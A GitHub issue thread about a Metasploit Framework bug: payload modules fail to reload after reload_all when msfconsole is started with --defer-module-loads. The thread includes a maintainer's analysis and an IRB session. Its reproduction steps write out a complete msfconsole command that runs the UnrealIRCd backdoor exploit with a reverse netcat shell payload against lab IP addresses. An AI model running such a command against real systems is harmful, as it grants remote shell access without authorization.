reload_all doesn't load payloads when msfconsole started with --defer-module-loads flag

[reider-roque]

Platform/Version information:

root@kali:/tmp# lsb_release -d
Description:    Kali GNU/Linux 1.1.0
root@kali:/tmp# uname -a
Linux kali 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) x86_64 GNU/Linux
root@kali:/tmp# apt-cache show metasploit-framework | grep Version
Version: 4.11.1-2015031701-1kali0

For example the following command leads to the '[-] Exploit failed: A payload has not been selected.' error:

root@kali:/tmp# msfconsole -x "reload_all; use exploit/unix/irc/unreal_ircd_3281_backdoor; set RHOST 192.168.47.129; set PAYLOAD cmd/unix/reverse_netcat; set LHOST 192.168.47.130; exploit" --defer-module-loads
[*] Starting the Metasploit Framework console...\
...banner...
[*] Reloading modules from all module paths...
...banner...
RHOST => 192.168.47.129
PAYLOAD => cmd/unix/reverse_netcat
LHOST => 192.168.47.130
[-] Exploit failed: A payload has not been selected.
msf exploit(unreal_ircd_3281_backdoor) > 

[wvu]

A payload is a module.

[wvu]

But this looks like a real bug.

[wchen-r7]

So we sort of have a workaround for you, just do:

./msfconsole -x "reload_all; loadpath [path_to msf/modules]; use exploit/unix/irc/unreal_ircd_3281_backdoor; set RHOST 192.168.47.129; set PAYLOAD cmd/unix/reverse_netcat; set LHOST 192.168.47.130; exploit" --defer-module-loads

And that'll work.

However we actually did reproduce the problem.

@limhoff-r7 This is a loading issue (all modules are reloaded except for payloads), thoughts?

[wchen-r7]

Ok so here's how much I know about the problem.

So when you do this:

./msfconsole -x "reload_all" --defer-module-loads

At one point you will hit #demand_load_modules, probably by framework.payloads.each_module, which can be triggered by "show payloads" when you use an exploit (but other commands like set payload can cause the same failure too).

Anyways, in #demand_load_modules, it's doing this check:

if (mod == Msf::SymbolicModule)

When we do --defer-module-loads and then reload_all again, the modules aren't Msf::SymbolicModule objects, instead they are "__SYMBOLIC__" strings. For some reason, they're not initialized.

Another side-effect of this is that at some point framework.payloads is completely cleared. For example:

$ ./msfconsole -q --defer-module-loads
msf > reload_all
[*] Reloading modules from all module paths...

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1465 exploits - 839 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > irb
[*] Starting IRB shell...

>> framework.payloads.length
=> 428
>> framework.payloads.each_module {}
=> []
>> framework.payloads.length
=> 0
>> 

framework.payloads.each_module from the above example should not be empty.

[sangria123]

i have problem how can i fix ?
msf>use exploit/
[-]failed to load modules: exploit

[wvu]

Wrong place to be asking that question.

[github-actions]

Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.

We've labeled this as attic and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.